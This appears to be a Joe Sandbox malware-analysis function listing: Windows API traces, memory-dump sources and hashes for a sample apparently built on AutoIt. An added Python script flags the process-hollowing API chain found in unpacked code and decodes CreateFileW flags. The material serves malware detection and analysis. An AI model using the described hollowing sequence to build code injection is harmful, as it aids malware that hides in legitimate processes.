            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: ChangeCloseErrorFindLastNotification__dosmaperr
            • String ID:
            • API String ID: 490808831-0
            • Opcode ID: c42a854080dbcb58e9c6a57a291f2cc85304c4501b6fc46ce6029f6cf68e21d2
            • Instruction ID: 62fba4434c0ae4f6948be0e657221da8f6d89467453d51e554f130ec94740d13
            • Opcode Fuzzy Hash: c42a854080dbcb58e9c6a57a291f2cc85304c4501b6fc46ce6029f6cf68e21d2
            • Instruction Fuzzy Hash: DB01DF33E0556026D66566349945B7E7B4B4B82BF4F3D021BF8149B3D2DD69CC82B250
            APIs
            • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,01012CD4,?,?,?,00000004,00000001), ref: 01012FF2
            • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,01012CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 01013006
            • CloseHandle.KERNEL32(00000000,?,01012CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0101300D
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: File$CloseCreateHandleTime
            • String ID:
            • API String ID: 3397143404-0
            • Opcode ID: 5e408147add9cb30ded627784773e0686b7537a6d5fc1fb2b53995cabab9cb18
            • Instruction ID: 5fc032aa171d0330be2732da2f054c77d8c0dbb98433555e4140b7fa533eba87
            • Opcode Fuzzy Hash: 5e408147add9cb30ded627784773e0686b7537a6d5fc1fb2b53995cabab9cb18
            • Instruction Fuzzy Hash: 98E0863228021077F2311659BD0DF8B3E5CD786B71F104215F799B90C046A5550153A8
            APIs
            • __Init_thread_footer.LIBCMT ref: 00FB17F6
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Init_thread_footer
            • String ID: CALL
            • API String ID: 1385522511-4196123274
            • Opcode ID: 2fb3e19278752120baaee149c3ff4a5a6be9756ab240bfaca447c62e48464d09
            • Instruction ID: fc207b503d0500f73316a737755ea81480447fdde682ba45bd4366e36f33a269
            • Opcode Fuzzy Hash: 2fb3e19278752120baaee149c3ff4a5a6be9756ab240bfaca447c62e48464d09
            • Instruction Fuzzy Hash: 4E228B71A08201DFC724DF15C890BAABBF1BF85314F68891DE5868B361DB35E845EF92
            APIs
            • _wcslen.LIBCMT ref: 01016F6B
              • Part of subcall function 00FA4ECB: LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,01071418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FA4EFD
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: LibraryLoad_wcslen
            • String ID: >>>AUTOIT SCRIPT<<<
            • API String ID: 3312870042-2806939583
            • Opcode ID: cd08918e37d1cadc1f99a3784b76720559feefd62598a317681a7f34c0721e97
            • Instruction ID: 2c8b431b4541142c5070168a37381ce5ead6bfaf07c3cb361f313b81aca5e48e
            • Opcode Fuzzy Hash: cd08918e37d1cadc1f99a3784b76720559feefd62598a317681a7f34c0721e97
            • Instruction Fuzzy Hash: 3AB1BE711083018FDB15EF24CC919AEB7E5AF95300F44886DF496872A6EF38ED49DB92
            APIs
            • GetOpenFileNameW.COMDLG32(?), ref: 00FE2C8C
              • Part of subcall function 00FA3AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00FA3A97,?,?,00FA2E7F,?,?,?,00000000), ref: 00FA3AC2
              • Part of subcall function 00FA2DA5: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FA2DC4
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Name$Path$FileFullLongOpen
            • String ID: X
            • API String ID: 779396738-3081909835
            • Opcode ID: d72defded69fab5fc25f9988bd47755a64d6ec0bd77afe2829fb3f22aa15353d
            • Instruction ID: e55e53c89d2a0627c630b224b3b129e3fdd10757f538b6d6fee77c0bbc971b7d
            • Opcode Fuzzy Hash: d72defded69fab5fc25f9988bd47755a64d6ec0bd77afe2829fb3f22aa15353d
            • Instruction Fuzzy Hash: 6B21F6B1E002989FCB41DF98CC45BDE7BFCAF49314F004019E445F7241DBB859899BA1
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: __fread_nolock
            • String ID: EA06
            • API String ID: 2638373210-3962188686
            • Opcode ID: 94dd21ac006d0c79ebfedf8119cd8eaa7a7586c10e61ee59ddaaaac1431e3b8e
            • Instruction ID: b291db12a068dce9b3f3b7ed28ca6e01406f04626ae08ec9ce191706a7fc09b4
            • Opcode Fuzzy Hash: 94dd21ac006d0c79ebfedf8119cd8eaa7a7586c10e61ee59ddaaaac1431e3b8e
            • Instruction Fuzzy Hash: 8301B172944258BEDF28C7A9CC56FAEBBF89B05201F00459EE193D6181E5B8E6088B60
            APIs
            • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00FA3908
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: IconNotifyShell_
            • String ID:
            • API String ID: 1144537725-0
            • Opcode ID: 2e1f564a76c0a1c8215150b6bfd25830bb8538c4e55204a255c04f119e30d740
            • Instruction ID: b389036305367a2581c6d503926b818ae7694e174767f6a90706a88a4161f572
            • Opcode Fuzzy Hash: 2e1f564a76c0a1c8215150b6bfd25830bb8538c4e55204a255c04f119e30d740
            • Instruction Fuzzy Hash: 9F3193B1904301DFE720DF24D485797BBE8FB49718F00092EF5DA93280E77AAA44DB52
            APIs
            • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,?,?,00FA949C,?,00008000), ref: 00FA5773
            • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,?,?,00FA949C,?,00008000), ref: 00FE4052
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: CreateFile
            • String ID:
            • API String ID: 823142352-0
            • Opcode ID: 01e9d8244315298c1c355f14e83fbe77e3e9e2bfaac602a1c64d20ac647abb47
            • Instruction ID: 1f74327e0b95050233fd4185be0469a7ee7b1fa26d24e25da5ca5fb471b897af
            • Opcode Fuzzy Hash: 01e9d8244315298c1c355f14e83fbe77e3e9e2bfaac602a1c64d20ac647abb47
            • Instruction Fuzzy Hash: 52019231545225B6E3314A2ACC0EF977F98EF03BB0F108311BE9D6A1E0C7B45854EB90
            APIs
            • __Init_thread_footer.LIBCMT ref: 00FABB4E
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Init_thread_footer
            • String ID:
            • API String ID: 1385522511-0
            • Opcode ID: 2d0a139ac639c238765853bd0edb8454ea348147a8b8a016b42a1e9938a10659
            • Instruction ID: 5707aff3c805f1956a2f239a93cbe6bb8203da7e04a10d3f159dda0d2cbd8640
            • Opcode Fuzzy Hash: 2d0a139ac639c238765853bd0edb8454ea348147a8b8a016b42a1e9938a10659
            • Instruction Fuzzy Hash: FD32D1B1E00209DFDB20CF54C894BBEB7B5EF45320F148059EA45AB262DB79ED41EB61
            APIs
            • CreateProcessW.KERNELBASE(?,00000000), ref: 00F01A5B
            • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F01AF1
            • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F01B13
            Memory Dump Source
            • Source File: 00000000.00000002.1708173100.0000000000F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_f00000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Process$ContextCreateMemoryReadThreadWow64
            • String ID:
            • API String ID: 2438371351-0
            • Opcode ID: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
            • Instruction ID: 99667332aa9fcf74608288edb907f5b30001ca5b8f128e4efaf3e7393c71b316
            • Opcode Fuzzy Hash: c7490eb0849e98549b11c4fe0459da6d53c4872c769bbd933b9fbf1e0076ab14
            • Instruction Fuzzy Hash: 2E12CD24E14658C6EB24DF64D8507DEB232FF68300F1090E9D10DEB7A5E77A4E81DB5A
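            The three calls in the entry above (CreateProcessW, Wow64GetThreadContext, ReadProcessMemory) are the opening half of the process-hollowing sequence that the report's "Sample uses process hollowing technique" signature refers to, and they sit in a dump region at 00F00000 marked "based on PE: false", i.e. outside the AutoIt runtime image mapped at 00FA0000. The Python below is an added example written for this page; it is not Joe Sandbox code and not code recovered from the sample. It parses API lines in the rendering used in this listing, flags any function that hits every stage of the hollowing chain, reports whether that function lives in a mapped PE image, and names the CreateFileW access, share and disposition values that the listing shows only as hex. The stage grouping is the editor's own choice, and the sample input is constructed by copying three entries from this listing.

```python
"""Parse the 'APIs' entries of a Joe Sandbox function listing (the
"• Api.Module(args), ref: addr" lines rendered above) and flag the API chain
behind the report's process-hollowing signature.
Added example: not Joe Sandbox code and not taken from the analysed sample."""
import re
from dataclasses import dataclass, field

# One API line; nested calls carry a "Part of subcall function X:" prefix.
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function\s+(?P<sub>[0-9A-F]{8}):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]{8})\s*$"
)
# "Source File" line: region base and whether the region is a mapped PE image.
SOURCE_LINE = re.compile(
    r"Source File:.*Offset:\s*(?P<base>[0-9A-F]{8}),\s*based on PE:\s*(?P<pe>true|false)"
)

@dataclass
class Func:
    apis: list = field(default_factory=list)  # (api, module, args, ref, subcall or None)
    base: str = ""                             # base address of the dumped region
    in_pe_image: bool = True                   # False: code lives outside any loaded PE

def parse_report(text):
    """Split listing text into functions; a 'Source File' line closes each one."""
    funcs, cur = [], Func()
    for line in text.splitlines():
        m = API_LINE.match(line)
        if m:
            cur.apis.append((m["api"], m["mod"], m["args"] or "", m["ref"], m["sub"]))
            continue
        s = SOURCE_LINE.search(line)
        if s:
            cur.base, cur.in_pe_image = s["base"], s["pe"] == "true"
            funcs.append(cur)
            cur = Func()
    return funcs

# Stages of the hollowing sequence (editor's grouping); all three must be present.
HOLLOWING = {
    "spawn":   {"CreateProcessW", "CreateProcessA", "CreateProcessInternalW"},
    "context": {"GetThreadContext", "Wow64GetThreadContext",
                "SetThreadContext", "Wow64SetThreadContext"},
    "image":   {"ReadProcessMemory", "WriteProcessMemory",
                "NtUnmapViewOfSection", "VirtualAllocEx"},
}

def hollowing_hits(funcs):
    """Return (region base, stages, in_pe_image) for every function that spawns a
    process, touches a thread context and reads or rewrites the target's memory."""
    hits = []
    for f in funcs:
        names = {api for api, *_ in f.apis}
        stages = sorted(s for s, group in HOLLOWING.items() if names & group)
        if len(stages) == len(HOLLOWING):
            hits.append((f.base, stages, f.in_pe_image))
    return hits

ACCESS = {0x80000000: "GENERIC_READ", 0x40000000: "GENERIC_WRITE", 0x20000000: "GENERIC_EXECUTE"}
SHARE = {1: "FILE_SHARE_READ", 2: "FILE_SHARE_WRITE", 4: "FILE_SHARE_DELETE"}
DISPOSITION = {1: "CREATE_NEW", 2: "CREATE_ALWAYS", 3: "OPEN_EXISTING",
               4: "OPEN_ALWAYS", 5: "TRUNCATE_EXISTING"}

def decode_createfile(args):
    """Name CreateFileW's dwDesiredAccess, dwShareMode and dwCreationDisposition
    from the hex argument list ('?' is a value the plugin could not resolve)."""
    raw = [a.strip() for a in args.split(",")]
    val = lambda i: None if raw[i] == "?" else int(raw[i], 16)
    bits = lambda table, v: "|".join(n for b, n in table.items() if v & b) or hex(v)
    access, share, disp = val(1), val(2), val(4)
    return ("?" if access is None else bits(ACCESS, access),
            "?" if share is None else bits(SHARE, share),
            "?" if disp is None else DISPOSITION.get(disp, hex(disp)))

# Constructed input: three entries copied from the listing on this page.
SAMPLE = """\
APIs
• CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,00000000,?,?,01012CD4,?,?,?,00000004,00000001), ref: 01012FF2
• SetFileTime.KERNELBASE(00000000,?,00000000,?,?,01012CD4,?,?,?,00000004,00000001,?,?,00000004,00000001), ref: 01013006
• CloseHandle.KERNEL32(00000000,?,01012CD4,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 0101300D
Memory Dump Source
• Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 00F01A5B
• Wow64GetThreadContext.KERNEL32(?,00010007), ref: 00F01AF1
• ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 00F01B13
Memory Dump Source
• Source File: 00000000.00000002.1708173100.0000000000F00000.00000040.00001000.00020000.00000000.sdmp, Offset: 00F00000, based on PE: false
APIs
• GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 00FA2DC4
  • Part of subcall function 00FA6B57: _wcslen.LIBCMT ref: 00FA6B6A
Memory Dump Source
• Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
"""

if __name__ == "__main__":
    funcs = parse_report(SAMPLE)
    for base, stages, in_pe in hollowing_hits(funcs):
        where = "inside a mapped PE image" if in_pe else "outside any PE image (unpacked or injected code)"
        print(f"hollowing chain at {base}: {'+'.join(stages)}, {where}")
    for f in funcs:
        for api, _mod, args, ref, _sub in f.apis:
            if api == "CreateFileW":
                print(f"CreateFileW @ {ref}: access/share/disposition = {decode_createfile(args)}")
```

            Run as a script it reports the chain at 00F00000 as living outside any PE image, which is the detail worth keeping from this entry: the hollowing logic is not part of the AutoIt interpreter at 00FA0000 but of code unpacked into an anonymous region. A 4-byte ReadProcessMemory right after Wow64GetThreadContext is the typical read of the new process's PEB image base; the write, SetThreadContext and ResumeThread stages are not shown in this entry, so the parser deliberately accepts a partial chain rather than requiring the full sequence.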
            APIs
              • Part of subcall function 00FA4E90: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FA4EDD,?,01071418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FA4E9C
              • Part of subcall function 00FA4E90: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 00FA4EAE
              • Part of subcall function 00FA4E90: FreeLibrary.KERNEL32(00000000,?,?,00FA4EDD,?,01071418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FA4EC0
            • LoadLibraryExW.KERNELBASE(?,00000000,00000002,?,01071418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FA4EFD
              • Part of subcall function 00FA4E59: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00FE3CDE,?,01071418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FA4E62
              • Part of subcall function 00FA4E59: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 00FA4E74
              • Part of subcall function 00FA4E59: FreeLibrary.KERNEL32(00000000,?,?,00FE3CDE,?,01071418,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?,?,?,00000000), ref: 00FA4E87
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: Library$Load$AddressFreeProc
            • String ID:
            • API String ID: 2632591731-0
            • Opcode ID: c9b2f478df9d9151e6a7caf0a387c5e0abc71c300fbad174669ecbbcffd871ef
            • Instruction ID: 5216ed7cc5fd8adb01e8dc99da7b754452aa3d9e1458c8eeb1801530c5d45cb6
            • Opcode Fuzzy Hash: c9b2f478df9d9151e6a7caf0a387c5e0abc71c300fbad174669ecbbcffd871ef
            • Instruction Fuzzy Hash: AA112772600205AEDB14AB64DD06FAD77A49F81B10F20842DF492FB1C1DEB8FE04B750
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: __wsopen_s
            • String ID:
            • API String ID: 3347428461-0
            • Opcode ID: e49e0d29d8f020364365398fbda55ba7f546b215d040a5e6a84db52545ef1b00
            • Instruction ID: 5974ee2b96c6332e24886dbfe4792e691002858bdfe555071adff1fa1a5bbb6e
            • Opcode Fuzzy Hash: e49e0d29d8f020364365398fbda55ba7f546b215d040a5e6a84db52545ef1b00
            • Instruction Fuzzy Hash: C811487190410AAFCB05DF58E940ADE7BF5EF49310F14405AF808AB302DB31EA12DBA5
            APIs
            • ReadFile.KERNELBASE(?,?,00010000,00000000,00000000,?,?,00000000,?,00FA543F,?,00010000,00000000,00000000,00000000,00000000), ref: 00FA9A9C
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: FileRead
            • String ID:
            • API String ID: 2738559852-0
            • Opcode ID: 70ca12dd027b1386bfb16f54c984689d3eed8ac261d77a6fc309d3f771d86e4f
            • Instruction ID: 2aa596b5dbbde65fa298ec8845a2a3ae4de9a4572510260035c680ecaa6cf0db
            • Opcode Fuzzy Hash: 70ca12dd027b1386bfb16f54c984689d3eed8ac261d77a6fc309d3f771d86e4f
            • Instruction Fuzzy Hash: 12118C722087009FD720CE05C880B62B7F8EF45760F10C42EE9AB86650C7B4B845EB60
            APIs
              • Part of subcall function 00FD4C7D: RtlAllocateHeap.NTDLL(00000008,00FA1129,00000000,?,00FD2E29,00000001,00000364,?,?,?,00FCF2DE,00FD3863,01071444,?,00FBFDF5,?), ref: 00FD4CBE
            • _free.LIBCMT ref: 00FD506C
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: AllocateHeap_free
            • String ID:
            • API String ID: 614378929-0
            • Opcode ID: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
            • Instruction ID: 69519530467481695a43f793c742f94b4594df087713208d0ab19cb803d1e238
            • Opcode Fuzzy Hash: 9ba45ce058d1080761d5af908226540236078fd1fc19e2e0238d0ad147f07c6e
            • Instruction Fuzzy Hash: CB0126726047056BE3218E699C85A5AFBEEFB89370F29051EE18483380EA30A805D6B4
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID:
            • String ID:
            • API String ID:
            • Opcode ID: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
            • Instruction ID: aab941764affc67ff22c1c5d08212a54c00d22948a13837fa2bb7c27a94bc38a
            • Opcode Fuzzy Hash: d6c69ec2a70ac845cc05b5f137181c3f07394ab8b33ef369e8c7ef627d5c9574
            • Instruction Fuzzy Hash: 85F0F932931A1597C7313A798E07F5E339D9F62370F14072EF421922D1DB79E802B9A5
            APIs
            • RtlAllocateHeap.NTDLL(00000008,00FA1129,00000000,?,00FD2E29,00000001,00000364,?,?,?,00FCF2DE,00FD3863,01071444,?,00FBFDF5,?), ref: 00FD4CBE
            Memory Dump Source
            • Source File: 00000000.00000002.1708463643.0000000000FA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FA0000, based on PE: true
            • Associated: 00000000.00000002.1708272707.0000000000FA0000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.000000000103C000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708572201.0000000001062000.00000002.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708672963.000000000106C000.00000004.00000001.01000000.00000003.sdmp
            • Associated: 00000000.00000002.1708720190.0000000001074000.00000002.00000001.01000000.00000003.sdmp
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_fa0000_8t1uarSZFV.jbxd
            Similarity
            • API ID: AllocateHeap
            • String ID:
            • API String ID: 1279760036-0
            • Opcode ID: ec0351a53557338327dd9deee1a843cde4d26f4fff8cc81bdea1981f6f256f22
            • Instruction ID: 85530abf6edb2c6368bbd425f4e88eba33c68870c2b553a199a9a8df8bda304b
            • Opcode Fuzzy Hash: ec0351a53557338327dd9deee1a843cde4d26f4fff8cc81bdea1981f6f256f22
            • Instruction Fuzzy Hash: 8AF02432A2222067DB205E229D06F5A378AAF413B0B0C4117B805EB380CA34F800B2A0
            APIs
            • RtlAllocateHeap.NTDLL(00000000,?,01071444,?,00FBFDF5,?,?,00FAA976,00000010,01071440,00FA13FC,?,00FA13C6,?,00FA1129), ref: 00FD3852
            Memory Dump Source
